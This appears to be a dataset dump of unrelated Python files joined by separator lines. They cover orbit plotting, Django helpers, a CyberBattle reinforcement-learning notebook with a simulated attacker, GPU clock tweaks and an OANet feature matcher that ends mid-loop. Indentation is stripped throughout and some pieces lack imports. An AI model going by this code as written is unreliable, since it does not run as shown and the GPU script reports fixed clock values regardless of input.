import matplotlib.animation as animation
import sys
# https://towardsdatascience.com/modelling-the-three-body-problem-in-classical-mechanics-using-python-9dc270ad7767
# https://evgenii.com/blog/two-body-problem-simulator/
animate = False
trail = False
previous = 0
def plotData(x1data,x2data,y1data,y2data, z1data, z2data):
global animate
fig = plt.figure()
ax = plt.axes(projection='3d')
if animate:
firstBodyTrail, = ax.plot(x1data, y1data, z1data,'blue',label="body1(t)")
secondBodyTrail, = ax.plot(x2data, y2data, z2data, '#f5a60a',label="body2(t)")
firstBody, = ax.plot(x1data, y1data, z1data,'blue', marker="o")
secondBody, = ax.plot(x2data, y2data, z2data, '#f5a60a',marker="o")
ax.legend()
def updateAnimation(num):
global previous, trail
if num<len(x1data):
firstBodyTrail.set_data(x1data[previous:num], y1data[previous:num])
firstBodyTrail.set_3d_properties(z1data[previous:num])
firstBody.set_data(x1data[num], y1data[num])
firstBody.set_3d_properties(z1data[num])
secondBodyTrail.set_data(x2data[previous:num], y2data[previous:num])
secondBodyTrail.set_3d_properties(z2data[previous:num])
secondBody.set_data(x2data[num], y2data[num])
secondBody.set_3d_properties(z2data[num])
# Trail
if trail:
if (num - previous)<260 and num > 250:
previous = previous + 1
#secondBody.set_color('#9944'+"%02x"%((0x55+num)%0xFF))
return firstBodyTrail, secondBodyTrail,
anim = animation.FuncAnimation(fig,updateAnimation, interval=1,blit=False)
else:
ax.scatter(x1data, y1data, z1data, label="x1(t)")
ax.scatter(x2data, y2data, z2data, label="x2(t)")
ax.legend()
plt.show()
def calculateTrajectories(t, m1, m2, r, R):
# Data for a three-dimensional line
x1data = np.zeros((len(t)))
y1data = np.zeros((len(t)))
z1data = np.zeros((len(t)))
x2data = np.zeros((len(t)))
y2data = np.zeros((len(t)))
z2data = np.zeros((len(t)))
m1 = float(m1)
m2 = float(m2)
M = m1 + m2
for i in range(len(t)):
#print(r[i][0])
x1data[i] = float(R[i][0]) + m2/M * float(r[i][0])
y1data[i] = float(R[i][1]) + m2/M * float(r[i][1])
z1data[i] = float(R[i][2]) + m2/M * float(r[i][2])
x2data[i] = float(R[i][0]) - m1/M * float(r[i][0])
y2data[i] = float(R[i][1]) - m1/M * float(r[i][1])
z2data[i] = float(R[i][2]) - m1/M * float(r[i][2])
#print("%-4d %-10s %-10s %-10s %-10s %-10s %-10s"%(i, x1data[i], x2data[i], y1data[i], y2data[i], z1data[i], z2data[i]))
plotData(x1data,x2data,y1data,y2data,z1data,z2data)
if __name__ == "__main__":
print(sys.argv)
if len(sys.argv) == 2:
if sys.argv[1] == "-animate":
animate = True
elif sys.argv[1] == "-animatetrail":
animate = True
trail = True
f = open("data.out","r")
data = f.readlines()
f.close()
if data[0][0:2] == "m1" and data[1][0:2] == "m2" and data[2][0:1] == "t" and data[3][0:2] == "rx" and data[4][0:2] == "ry" and data[5][0:2] == "rz" and data[6][0:2] == "Rx" and data[7][0:2] == "Ry" and data[8][0:2] == "Rz":
m1 = data[0].split(" ")[2]
m2 = data[1].split(" ")[2]
t = data[2].split(" ")[2:]
rx = data[3].split(" ")[2:]
ry = data[4].split(" ")[2:]
rz = data[5].split(" ")[2:]
Rx = data[6].split(" ")[2:]
Ry = data[7].split(" ")[2:]
Rz = data[8].split(" ")[2:]
r = [list(a) for a in zip(rx,ry,rz)]
R = [list(a) for a in zip(Rx,Ry,Rz)]
calculateTrajectories(t, m1, m2, r, R)
elif data[0][0:2] == "m1" and data[1][0:2] == "m2" and data[2][0:1] == "t" and data[3][0:2] == "x1" and data[4][0:2] == "y1" and data[5][0:2] == "z1" and data[6][0:2] == "x2" and data[7][0:2] == "y2" and data[8][0:2] == "z2":
m1 = data[0].split(" ")[2]
m2 = data[1].split(" ")[2]
t = data[2].split(" ")[2:]
x1 = data[3].split(" ")[2:]
y1 = data[4].split(" ")[2:]
z1 = data[5].split(" ")[2:]
x2 = data[6].split(" ")[2:]
y2 = data[7].split(" ")[2:]
z2 = data[8].split(" ")[2:]
x1data = np.zeros((len(t)))
y1data = np.zeros((len(t)))
z1data = np.zeros((len(t)))
x2data = np.zeros((len(t)))
y2data = np.zeros((len(t)))
z2data = np.zeros((len(t)))
for idx in range(len(t)):
x1data[idx] = float(x1[idx])
y1data[idx] = float(y1[idx])
z1data[idx] = float(z1[idx])
x2data[idx] = float(x2[idx])
y2data[idx] = float(y2[idx])
z2data[idx] = float(z2[idx])
plotData(x1data,x2data,y1data,y2data,z1data,z2data)
| nilq/baby-python | python |
__author__ = 'anthonymendoza'
from django.db.models import Q, QuerySet
from rest_framework.response import Response
from rest_framework import status
def dynamic_field_lookups(query_params):
Qr = None
for filter_by, filter_value in query_params.iteritems():
filter_by = "date__gte" if filter_by == "start_date" else filter_by
filter_by = "date__lte" if filter_by == "end_date" else filter_by
if filter_by == 'dam_id':
q = Q(**{"%s__iexact" % filter_by: filter_value})
else:
q = Q(**{"%s" % filter_by: filter_value})
if Qr:
Qr = Qr & q
else:
Qr = q
return Qr
| nilq/baby-python | python |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
"""Tabular Q-learning agent (notebook)
This notebooks can be run directly from VSCode, to generate a
traditional Jupyter Notebook to open in your browser
you can run the VSCode command `Export Currenty Python File As Jupyter Notebook`.
"""
# pylint: disable=invalid-name
# %%
import sys
import logging
from typing import cast
import gym
import numpy as np
import matplotlib.pyplot as plt
from cyberbattle.agents.baseline.learner import TrainedLearner
import cyberbattle.agents.baseline.plotting as p
import cyberbattle.agents.baseline.agent_wrapper as w
import cyberbattle.agents.baseline.agent_tabularqlearning as a
from cyberbattle.agents.baseline.agent_wrapper import Verbosity
import cyberbattle.agents.baseline.learner as learner
from cyberbattle._env.cyberbattle_env import AttackerGoal
logging.basicConfig(stream=sys.stdout, level=logging.ERROR, format="%(levelname)s: %(message)s")
# %%
# Benchmark parameters:
# Parameters from DeepDoubleQ paper
# - learning_rate = 0.00025
# - linear epsilon decay
# - gamma = 0.99
# Eliminated gamma_values
# 0.0,
# 0.0015, # too small
# 0.15, # too big
# 0.25, # too big
# 0.35, # too big
#
# NOTE: Given the relatively low number of training episodes (50,
# a high learning rate of .99 gives better result
# than a lower learning rate of 0.25 (i.e. maximal rewards reached faster on average).
# Ideally we should decay the learning rate just like gamma and train over a
# much larger number of episodes
cyberbattlechain_10 = gym.make('CyberBattleChain-v0', size=10, attacker_goal=AttackerGoal(own_atleast_percent=1.0))
ep = w.EnvironmentBounds.of_identifiers(
maximum_node_count=12,
maximum_total_credentials=12,
identifiers=cyberbattlechain_10.identifiers
)
iteration_count = 9000
training_episode_count = 5
eval_episode_count = 5
gamma_sweep = [
0.015, # about right
]
def qlearning_run(gamma, gym_env):
"""Execute one run of the q-learning algorithm for the
specified gamma value"""
return learner.epsilon_greedy_search(
gym_env,
ep,
a.QTabularLearner(ep, gamma=gamma, learning_rate=0.90, exploit_percentile=100),
episode_count=training_episode_count,
iteration_count=iteration_count,
epsilon=0.90,
render=False,
epsilon_multdecay=0.75, # 0.999,
epsilon_minimum=0.01,
verbosity=Verbosity.Quiet,
title="Q-learning"
)
# %%
# Run Q-learning with gamma-sweep
qlearning_results = [qlearning_run(gamma, cyberbattlechain_10) for gamma in gamma_sweep]
qlearning_bestrun_10 = qlearning_results[0]
# %%
p.new_plot_loss()
for results in qlearning_results:
p.plot_all_episodes_loss(cast(a.QTabularLearner, results['learner']).loss_qsource.all_episodes, 'Q_source', results['title'])
p.plot_all_episodes_loss(cast(a.QTabularLearner, results['learner']).loss_qattack.all_episodes, 'Q_attack', results['title'])
plt.legend(loc="upper right")
plt.show()
# %% Plot episode length
p.plot_episodes_length(qlearning_results)
# %%
nolearning_results = learner.epsilon_greedy_search(
cyberbattlechain_10,
ep,
learner=a.QTabularLearner(ep, trained=qlearning_bestrun_10['learner'],
gamma=0.0, learning_rate=0.0, exploit_percentile=100),
episode_count=eval_episode_count,
iteration_count=iteration_count,
epsilon=0.30, # 0.35,
render=False,
title="Exploiting Q-matrix",
verbosity=Verbosity.Quiet
)
# %%
randomlearning_results = learner.epsilon_greedy_search(
cyberbattlechain_10,
ep,
learner=a.QTabularLearner(ep, trained=qlearning_bestrun_10['learner'],
gamma=0.0, learning_rate=0.0, exploit_percentile=100),
episode_count=eval_episode_count,
iteration_count=iteration_count,
epsilon=1.0, # purely random
render=False,
verbosity=Verbosity.Quiet,
title="Random search"
)
# %%
# Plot averaged cumulative rewards for Q-learning vs Random vs Q-Exploit
all_runs = [*qlearning_results,
randomlearning_results,
nolearning_results
]
Q_source_10 = cast(a.QTabularLearner, qlearning_bestrun_10['learner']).qsource
Q_attack_10 = cast(a.QTabularLearner, qlearning_bestrun_10['learner']).qattack
p.plot_averaged_cummulative_rewards(
all_runs=all_runs,
title=f'Benchmark -- max_nodes={ep.maximum_node_count}, episodes={eval_episode_count},\n'
f'dimension={Q_source_10.state_space.flat_size()}x{Q_source_10.action_space.flat_size()}, '
f'{Q_attack_10.state_space.flat_size()}x{Q_attack_10.action_space.flat_size()}\n'
f'Q1={[f.name() for f in Q_source_10.state_space.feature_selection]} '
f'-> {[f.name() for f in Q_source_10.action_space.feature_selection]})\n'
f"Q2={[f.name() for f in Q_attack_10.state_space.feature_selection]} -> 'action'")
# %%
# plot cumulative rewards for all episodes
p.plot_all_episodes(qlearning_results[0])
# %%
# Plot the Q-matrices
# %%
# Print non-zero coordinate in the Q matrix Q_source
i = np.where(Q_source_10.qm)
q = Q_source_10.qm[i]
list(zip(np.array([Q_source_10.state_space.pretty_print(i) for i in i[0]]),
np.array([Q_source_10.action_space.pretty_print(i) for i in i[1]]), q))
# %%
# Print non-zero coordinate in the Q matrix Q_attack
i2 = np.where(Q_attack_10.qm)
q2 = Q_attack_10.qm[i2]
list(zip([Q_attack_10.state_space.pretty_print(i) for i in i2[0]],
[Q_attack_10.action_space.pretty_print(i) for i in i2[1]], q2))
##################################################
# %% [markdown]
# ## Transfer learning from size 4 to size 10
# Exploiting Q-matrix learned from a different network.
# %%
# Train Q-matrix on CyberBattle network of size 4
cyberbattlechain_4 = gym.make('CyberBattleChain-v0', size=4,
attacker_goal=AttackerGoal(own_atleast_percent=1.0)
)
qlearning_bestrun_4 = qlearning_run(0.015, gym_env=cyberbattlechain_4)
def stop_learning(trained_learner):
return TrainedLearner(
learner=a.QTabularLearner(
ep,
gamma=0.0,
learning_rate=0.0,
exploit_percentile=0,
trained=trained_learner['learner']
),
title=trained_learner['title'],
trained_on=trained_learner['trained_on'],
all_episodes_rewards=trained_learner['all_episodes_rewards'],
all_episodes_availability=trained_learner['all_episodes_availability']
)
learner.transfer_learning_evaluation(
environment_properties=ep,
trained_learner=stop_learning(qlearning_bestrun_4),
eval_env=cyberbattlechain_10,
eval_epsilon=0.5, # alternate with exploration to help generalization to bigger network
eval_episode_count=eval_episode_count,
iteration_count=iteration_count
)
learner.transfer_learning_evaluation(
environment_properties=ep,
trained_learner=stop_learning(qlearning_bestrun_10),
eval_env=cyberbattlechain_4,
eval_epsilon=0.5,
eval_episode_count=eval_episode_count,
iteration_count=iteration_count
)
# %%
| nilq/baby-python | python |
# The init module for all CRUD in bash
import uuid
import re
from datetime import datetime
from app.model.Bash import Bash
from random import randint
from app.utils.helpers import (
md5,
dell,
get_trace,
gen_hash,
check_password,
generate_key
)
from app.utils.save_bash import save_bash
from app.utils.get_bash import (
get_bash,
get_all_publics_bash,
get_all_private_bash,
get_content_by_key,
find_b4sh,
count_all
)
from app.utils.update_bash import (
update_bash,
up_vote,
down_vote
)
from app.utils.delete_bash import delete_bash
# Example of a valid bash object
# {
# "bash_id": "1234",
# "key": "123:sad",
# "hash": "sadoisankjcn2798382hnkjsacndskjcndsccdsc",
# "title": "A simple echo",
# "author": "d4rk3r",
# "description": "This is a test of the echo command",
# "content": "echo 'test'",
# "stats": {
# "used_count": 3,
# "updated_count": 1,
# "up_vote": 17,
# "down_vote": 3,
# },
# "history": [],
# "date": "2020-04-11 04:47:09"
# }
# for some long commands, we can save it on termbin
# curl -d "username=mkyong&password=abc" termbin.com:9999 --output -
| nilq/baby-python | python |
import csv
from clint.textui import progress
from django.core.management.base import BaseCommand
from shapes.models import MaterialShape
from bsdfs.models import ShapeBsdfLabel_wd
class Command(BaseCommand):
args = ''
help = 'Helper to export CSV data'
def handle(self, *args, **options):
print 'Fetching data...'
qset = MaterialShape.objects.filter(
correct=True,
bsdf_wd__color_correct=True,
bsdf_wd__gloss_correct=True,
bsdf_wd__init_method='KR',
photo__scene_category_correct_score__gt=0,
)
shapes = qset.values_list(
'id',
'photo__scene_category__name',
'photo__scene_category_correct_score',
'substance__name',
'name__name',
'planar',
'bsdf_wd',
)
bsdfs = ShapeBsdfLabel_wd.objects.in_bulk(
qset.values_list('bsdf_wd', flat=True)
)
filename = args[0] if len(args) >= 1 else 'out.csv'
print 'Writing data to %s...' % filename
with open(filename, 'wb') as f:
writer = csv.writer(f)
writer.writerow([
'shape_id',
'scene',
'scene_correct_score',
'material_name',
'object_name',
'planar',
'bsdf_wd_id',
'rho_d_r',
'rho_d_g',
'rho_d_b',
'rho_s_r',
'rho_s_g',
'rho_s_b',
'alpha',
'colored_reflection',
'color_correct_score',
'gloss_correct_score',
])
for shape in progress.bar(shapes):
b = bsdfs[shape[6]]
rho = b.rho()
writer.writerow(
list(shape) +
list(rho[0]) +
list(rho[1]) +
[b.alpha(), b.metallic, b.color_correct_score, b.gloss_correct_score]
)
| nilq/baby-python | python |
import os
import shutil
import typing
from ConfigSpaceNNI import ConfigurationSpace
from smac.configspace import pcs_new as pcs
class OutputWriter(object):
"""Writing scenario to file."""
def __init__(self):
pass
def write_scenario_file(self, scenario):
"""Write scenario to a file (format is compatible with input_reader).
Will overwrite if file exists. If you have arguments that need special
parsing when saving, specify so in the _parse_argument-function.
Creates output-dir if necessesary.
Parameters
----------
scenario: Scenario
Scenario to be written to file
Returns
-------
status: False or None
False indicates that writing process failed
"""
if scenario.output_dir_for_this_run is None or scenario.output_dir_for_this_run == "":
scenario.logger.info("No output directory for scenario logging "
"specified -- scenario will not be logged.")
return False
# Create output-dir if necessary
if not os.path.isdir(scenario.output_dir_for_this_run):
scenario.logger.debug("Output directory does not exist! Will be "
"created.")
try:
os.makedirs(scenario.output_dir_for_this_run)
except OSError:
raise OSError("Could not make output directory: "
"{}.".format(scenario.output_dir_for_this_run))
# options_dest2name maps scenario._arguments from dest -> name
options_dest2name = {(scenario._arguments[v]['dest'] if
scenario._arguments[v]['dest'] else v) : v for v in scenario._arguments}
# Write all options into "output_dir/scenario.txt"
path = os.path.join(scenario.output_dir_for_this_run, "scenario.txt")
scenario.logger.debug("Writing scenario-file to {}.".format(path))
with open(path, 'w') as fh:
for key in options_dest2name:
new_value = self._parse_argument(scenario, key, getattr(scenario, key))
if new_value is not None:
fh.write("{} = {}\n".format(options_dest2name[key], new_value))
def _parse_argument(self, scenario, key: str, value):
"""Some values of the scenario-file need to be changed upon writing,
such as the 'ta' (target algorithm), due to it's callback. Also,
the configspace, features, train_inst- and test-inst-lists are saved
to output_dir, if they exist.
Parameters:
-----------
scenario: Scenario
Scenario-file to be written
key: string
Name of the attribute in scenario-file
value: Any
Corresponding attribute
Returns:
--------
new value: string
The altered value, to be written to file
Sideeffects:
------------
- copies files pcs_fn, train_inst_fn, test_inst_fn and feature_fn to
output if possible, creates the files from attributes otherwise
"""
if key in ['pcs_fn', 'train_inst_fn', 'test_inst_fn', 'feature_fn']:
# Copy if file exists, else write to new file
if value is not None and os.path.isfile(value):
try:
return shutil.copy(value, scenario.output_dir_for_this_run)
except shutil.SameFileError:
return value # File is already in output_dir
elif key == 'pcs_fn' and scenario.cs is not None:
new_path = os.path.join(scenario.output_dir_for_this_run, "configspace.pcs")
self.write_pcs_file(scenario.cs, new_path)
elif key == 'train_inst_fn' and scenario.train_insts != [None]:
new_path = os.path.join(scenario.output_dir_for_this_run, 'train_insts.txt')
self.write_inst_file(scenario.train_insts, new_path)
elif key == 'test_inst_fn' and scenario.test_insts != [None]:
new_path = os.path.join(scenario.output_dir_for_this_run, 'test_insts.txt')
self.write_inst_file(scenario.test_insts, new_path)
elif key == 'feature_fn' and scenario.feature_dict != {}:
new_path = os.path.join(scenario.output_dir_for_this_run, 'features.txt')
self.write_inst_features_file(scenario.n_features,
scenario.feature_dict, new_path)
else:
return None
# New value -> new path
return new_path
elif key == 'ta' and value is not None:
# Reversing the callback on 'ta' (shlex.split)
return " ".join(value)
elif key in ['train_insts', 'test_insts', 'cs', 'feature_dict']:
# No need to log, recreated from files
return None
else:
return value
def write_inst_file(self, insts: typing.List[str], fn: str):
"""Writes instance-list to file.
Parameters
----------
insts: list<string>
Instance list to be written
fn: string
Output path
"""
with open(fn, 'w') as fh:
fh.write("\n".join(insts))
def write_inst_features_file(self, n_features: int, feat_dict, fn: str):
"""Writes features to file.
Parameters
----------
n_features: int
Number of features
feat_dict: dict
Features to be written
fn: string
File name of instance feature file
"""
header = "Instance, " + ", ".join(
["feature"+str(i) for i in range(n_features)]) + "\n"
body = [", ".join([inst] + [str(f) for f in feat_dict[inst]]) + "\n"
for inst in feat_dict]
with open(fn, 'w') as fh:
fh.write(header + "".join(body))
def write_pcs_file(self, cs: ConfigurationSpace, fn: str):
"""Writing ConfigSpace to file.
Parameters
----------
cs: ConfigurationSpace
Config-space to be written
fn: string
Output-file-path
"""
with open(fn, 'w') as fh:
fh.write(pcs.write(cs))
| nilq/baby-python | python |
# Generated by Django 3.2.8 on 2022-01-17 16:25
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Cause',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cause_id', models.TextField(max_length=200, verbose_name='Cause ID')),
('label', models.TextField(max_length=200, verbose_name='Cause Label')),
('created', models.DateTimeField(auto_now_add=True, verbose_name='Cause Created')),
('updated', models.DateTimeField(auto_now=True, verbose_name='Cause Updated')),
('tickets', models.IntegerField(blank=True, default=0, null=True, verbose_name='Ticket Count')),
],
),
]
| nilq/baby-python | python |
import os
import glob
import pandas as pd
flag = True
results = pd.DataFrame()
for counter, current_file in enumerate(glob.glob("*.CSV")):
namedf = pd.read_csv(current_file, header=None, sep=";")
# print(namedf)
results = pd.concat([results, namedf])
results.to_csv('Combined.csv', index=None, sep=",")
# extension = 'CSV'
# all_filenames = [i for i in glob.glob('*.{}'.format(extension))]
# #combine all files in the list
# combined_csv = pd.concat([pd.read_csv(f, sep=';') for f in all_filenames ])
# #export to csv
# print(combined_csv.head())
# # combined_csv.to_csv( "combined_raw.csv", index=False, encoding='utf-8-sig') | nilq/baby-python | python |
from django.conf.urls import url
from django.contrib.auth.decorators import login_required, permission_required
from . import views
urlpatterns = [
url(r'^record_history/(?P<account_id>\d+)/$', login_required(views.RecordHistoryView.as_view()), name = 'record_history'),
url(r'^account_list/(?P<trade_type>\w+)/$', login_required(views.AccountListView.as_view()), name = 'account_list'),
url(r'^account_history/(?P<account_id>\d+)/$', login_required(views.AccountHistoryView.as_view()), name = 'account_history'),
url(r'^account_history/(?P<trade_type>\w+)/$', login_required(views.AccountHistoryView.as_view()), name = 'account_histories'),
url(r'^rebalance_list/$', login_required(views.RebalanceListView.as_view()), name = 'rebalance_list'),
url(r'^rebalance_history/(?P<pair_id>\d+)/$', login_required(views.RebalanceHistoryView.as_view()), name = 'rebalance_history'),
url(r'^rebalance_history/$', login_required(views.RebalanceHistoryView.as_view()), name = 'rebalance_histories'),
] | nilq/baby-python | python |
a = input('Digite algo: ')
print('é minusculo?', a.islower())
print('é maiuscula?', a.isupper())
print('é um número?', a.isnumeric())
print('é uma letra?', a.isalpha())
| nilq/baby-python | python |
from gym_brt.envs.reinforcementlearning_extensions.rl_reward_functions import (
swing_up_reward,
balance_reward
)
from gym_brt.envs.qube_balance_env import (
QubeBalanceEnv,
)
from gym_brt.envs.qube_swingup_env import (
QubeSwingupEnv,
)
from gym_brt.envs.reinforcementlearning_extensions.rl_gym_classes import (
QubeBeginUpEnv,
QubeBeginDownEnv,
RandomStartEnv,
NoisyEnv,
convert_state,
convert_state_back
)
from gym.envs.registration import register
register(
id='QubeBeginDownEnv-v1',
entry_point='gym_brt.envs:QubeBeginDownEnv',
)
register(
id='QubeSwingupEnv-v1',
entry_point='gym_brt.envs:QubeSwingupEnv',
)
register(
id='QubeBeginUpEnv-v1',
entry_point='gym_brt.envs:QubeBeginUpEnv',
)
register(
id='QubeNoisyEnv-v1',
entry_point='gym_brt.envs:NoisyEnv',
)
register(
id='QubeRandomStartEnv-v1',
entry_point='gym_brt.envs:RandomStartEnv',
) | nilq/baby-python | python |
#!/usr/bin/env python
# coding=UTF-8
#The first line allows this script to be executable
import os
import sys
import operator
from termcolor import colored
def boost_mode():
print colored('Warning: Some features may not be available except to Titan Series GPUs, nvidia-smi will tell you which ones you can do','red',attrs=['bold'])
gpu_clock = str(raw_input("Enter your maximum GPU clock in mhz (e.g. 1124): "))
mem_clock = str(raw_input("Enter your maximum memory clock in mhz (e.g. 960): "))
os.system('nvidia-smi -pm 1')
os.system('nvidia-smi -e 1')
cmd_String = 'nvidia-smi -ac %s,%s' % (mem_clock,gpu_clock)
os.system(cmd_String)
os.system('nvidia-smi --auto-boost-permission=0')
os.system('nvidia-smi --auto-boost-default=1')
print colored('[*] Clock set to 1124 mhz GPU, 960 mhz memory','yellow',attrs=['bold'])
main()
return
def monitor_systems():
cmd_String = "gnome-terminal -e 'bash -c \"nvidia-smi dmon; exec bash\"'"
os.system(cmd_String)
cmd_String = "gnome-terminal -e 'bash -c \"nvidia-smi stats; exec bash\"'"
os.system(cmd_String)
print colored('[*] All monitoring modes enabled','yellow',attrs=['bold'])
return
def main():
print colored('MAIN MENU','cyan',attrs=['bold'])
opt_List = [
'\n\t#0. Exit Program',
'#1. Set my video card to full constant-boost mode',
'#2. Activate all monitoring systems'
]
print ("\n\t".join(opt_List))
opt_Choice = str(raw_input("Enter a OPTION: "))
if opt_Choice == "0":
exit(0)
elif opt_Choice == "1":
os.system('clear')
boost_mode()
main()
elif opt_Choice == "2":
os.system('clear')
monitor_systems()
main()
main()
| nilq/baby-python | python |
import torch
import numpy as np
import argparse
import os
import glob
from tqdm import tqdm
from collections import namedtuple
import sys
sys.path.append('../core')
from oan import OANet
from io_util import read_keypoints, read_descriptors, write_matches
class NNMatcher(object):
"""docstring for NNMatcher"""
def __init__(self, ):
super(NNMatcher, self).__init__()
def run(self, nkpts, descs):
# pts1, pts2: N*2 GPU torch tensor
# desc1, desc2: N*C GPU torch tensor
# corr: N*4
# sides: N*2
# corr_idx: N*2
pts1, pts2, desc1, desc2 = nkpts[0], nkpts[1], descs[0], descs[1]
d1, d2 = (desc1**2).sum(1), (desc2**2).sum(1)
distmat = (d1.unsqueeze(1) + d2.unsqueeze(0) - 2*torch.matmul(desc1, desc2.transpose(0,1))).sqrt()
dist_vals, nn_idx1 = torch.topk(distmat, k=2, dim=1, largest=False)
nn_idx1 = nn_idx1[:,0]
_, nn_idx2 = torch.topk(distmat, k=1, dim=0, largest=False)
nn_idx2= nn_idx2.squeeze()
mutual_nearest = (nn_idx2[nn_idx1] == torch.arange(nn_idx1.shape[0]).cuda())
ratio_test = dist_vals[:,0] / dist_vals[:,1].clamp(min=1e-15)
pts2_match = pts2[nn_idx1, :]
corr = torch.cat([pts1, pts2_match], dim=-1)
corr_idx = torch.cat([torch.arange(nn_idx1.shape[0]).unsqueeze(-1), nn_idx1.unsqueeze(-1).cpu()], dim=-1)
sides = torch.cat([ratio_test.unsqueeze(1), mutual_nearest.float().unsqueeze(1)], dim=1)
return corr, sides, corr_idx
def infer(self, kpt_list, desc_list):
nkpts = [torch.from_numpy(i[:,:2].astype(np.float32)).cuda() for i in kpt_list]
descs = [torch.from_numpy(desc.astype(np.float32)).cuda() for desc in desc_list]
corr, sides, corr_idx = self.run(nkpts, descs)
inlier_idx = np.where(sides[:,1].cpu().numpy())
matches = corr_idx[inlier_idx[0], :].numpy().astype('int32')
corr0 = kpt_list[0][matches[:, 0]]
corr1 = kpt_list[1][matches[:, 1]]
return matches, corr0, corr1
class LearnedMatcher(object):
def __init__(self, model_path, inlier_threshold=0, use_ratio=2, use_mutual=2):
self.default_config = {}
self.default_config['net_channels'] = 128
self.default_config['net_depth'] = 12
self.default_config['clusters'] = 500
self.default_config['use_ratio'] = use_ratio
self.default_config['use_mutual'] = use_mutual
self.default_config['iter_num'] = 1
self.default_config['inlier_threshold'] = inlier_threshold
self.default_config = namedtuple("Config", self.default_config.keys())(*self.default_config.values())
self.model = OANet(self.default_config)
print('load model from ' +model_path)
checkpoint = torch.load(model_path)
self.model.load_state_dict(checkpoint['state_dict'])
self.model.cuda()
self.model.eval()
self.nn_matcher = NNMatcher()
def normalize_kpts(self, kpts):
x_mean = np.mean(kpts, axis=0)
dist = kpts - x_mean
meandist = np.sqrt((dist**2).sum(axis=1)).mean()
scale = np.sqrt(2) / meandist
T = np.zeros([3,3])
T[0,0], T[1,1], T[2,2] = scale, scale, 1
T[0,2], T[1,2] = -scale*x_mean[0], -scale*x_mean[1]
nkpts = kpts * np.asarray([T[0, 0], T[1, 1]]) + np.array([T[0, 2], T[1, 2]])
return nkpts
def infer(self, kpt_list, desc_list):
with torch.no_grad():
nkpts = [torch.from_numpy(self.normalize_kpts(i[:,:2]).astype(np.float32)).cuda() for i in kpt_list]
descs = [torch.from_numpy(desc.astype(np.float32)).cuda() for desc in desc_list]
corr, sides, corr_idx = self.nn_matcher.run(nkpts, descs)
corr, sides = corr.unsqueeze(0).unsqueeze(0), sides.unsqueeze(0)
data = {}
data['xs'] = corr
# currently supported mode:
if self.default_config.use_ratio==2 and self.default_config.use_mutual==2:
data['sides'] = sides
elif self.default_config.use_ratio==0 and self.default_config.use_mutual==1:
mutual = sides[0,:,1]>0
data['xs'] = corr[:,:,mutual,:]
data['sides'] = []
corr_idx = corr_idx[mutual,:]
elif self.default_config.use_ratio==1 and self.default_config.use_mutual==0:
ratio = sides[0,:,0] < 0.8
data['xs'] = corr[:,:,ratio,:]
data['sides'] = []
corr_idx = corr_idx[ratio,:]
elif self.default_config.use_ratio==1 and self.default_config.use_mutual==1:
mask = (sides[0,:,0] < 0.8) & (sides[0,:,1]>0)
data['xs'] = corr[:,:,mask,:]
data['sides'] = []
corr_idx = corr_idx[mask,:]
elif self.default_config.use_ratio==0 and self.default_config.use_mutual==0:
data['sides'] = []
else:
raise NotImplementedError
y_hat, e_hat = self.model(data)
y = y_hat[-1][0, :].cpu().numpy()
inlier_idx = np.where(y > self.default_config.inlier_threshold)
matches = corr_idx[inlier_idx[0], :].numpy().astype('int32')
corr0 = kpt_list[0][matches[:, 0]]
corr1 = kpt_list[1][matches[:, 1]]
return matches, corr0, corr1
def str2bool(v):
return v.lower() in ("true", "1")
# Parse command line arguments.
parser = argparse.ArgumentParser(description='extract sift.')
parser.add_argument('--input_path', type=str, default='/home/liao/zjh/datasets/',
help='Image directory or movie file or "camera" (for webcam).')
parser.add_argument('--seqs', type=str, default='Fountain',
help='split by .')
parser.add_argument('--img_glob', type=str, default='*',
help='Glob match if directory of images is specified (default: \'*.png\').')
parser.add_argument('--input_suffix', type=str, default='sift-8000',
help='prefix of filename.')
parser.add_argument('--output_suffix', type=str, default='sift-8000-our',
help='prefix of filename.')
parser.add_argument('--use_prev_pairs', type=str2bool, default=False,
help='use previous image pairs')
parser.add_argument('--prev_output_suffix', type=str, default='sift-8000',
help='previous image pairs suffix')
parser.add_argument('--inlier_threshold', type=float, default=0,
help='inlier threshold. default: 0')
parser.add_argument('--use_learned_matcher', type=str2bool, default=True,
help='False: learned matcher, True: NN matcher')
parser.add_argument('--use_mutual', type=int, default=2,
help='0: not use mutual. 1: use mutual before learned matcher. 2: use mutual as side information')
parser.add_argument('--use_ratio', type=int, default=2,
help='0: not use ratio test. 1: use ratio test before learned matcher. 2: use ratio test as side information')
def dump_match(matcher, img1_name, img2_name, base_dir, input_suffix, output_suffix):
kpt1_name = os.path.join(base_dir, 'keypoints', img1_name+'.'+input_suffix+'.bin')
kpt2_name = os.path.join(base_dir, 'keypoints', img2_name+'.'+input_suffix+'.bin')
desc1_name = os.path.join(base_dir, 'descriptors', img1_name+'.'+input_suffix+'.bin')
desc2_name = os.path.join(base_dir, 'descriptors', img2_name+'.'+input_suffix+'.bin')
kpt1, kpt2 = read_keypoints(kpt1_name), read_keypoints(kpt2_name)
desc1, desc2 = read_descriptors(desc1_name), read_descriptors(desc2_name)
match_name = img1_name+'---'+img2_name+'.'+output_suffix+'.bin'
match_name = os.path.join(base_dir, 'matches', match_name)
matches, _, _ = matcher.infer([kpt1, kpt2], [desc1, desc2])
write_matches(match_name, matches)
if __name__ == "__main__":
opt = parser.parse_args()
seqs = opt.seqs.split('.')
if not opt.use_learned_matcher:
matcher = NNMatcher()
else:
if opt.use_ratio < 2 and opt.use_mutual < 2:
model_path = os.path.join('../model', 'sift-8k/model_best.pth')
matcher = LearnedMatcher(model_path, opt.inlier_threshold, use_ratio=opt.use_ratio, use_mutual=opt.use_mutual)
elif opt.use_ratio == 2 and opt.use_mutual == 2:
model_path = os.path.join('../model', 'sift-side-8k/model_best.pth')
matcher = LearnedMatcher(model_path, opt.inlier_threshold, use_ratio=2, use_mutual=2)
else:
raise NotImplementedError
for seq in seqs:
if not os.path.exists(opt.input_path+seq+'/matches'):
os.system('mkdir '+opt.input_path+seq+'/matches')
if not opt.use_prev_pairs:
# get image lists
search = os.path.join(opt.input_path, seq, 'images', opt.img_glob)
listing = glob.glob(search)
listing.sort()
pairs = []
for img1 in range(len(listing)):
for img2 in range(len(listing))[img1+1:]:
img1_name, img2_name = listing[img1].split('/')[-1], listing[img2].split('/')[-1]
pairs += [[img1_name, img2_name]]
else:
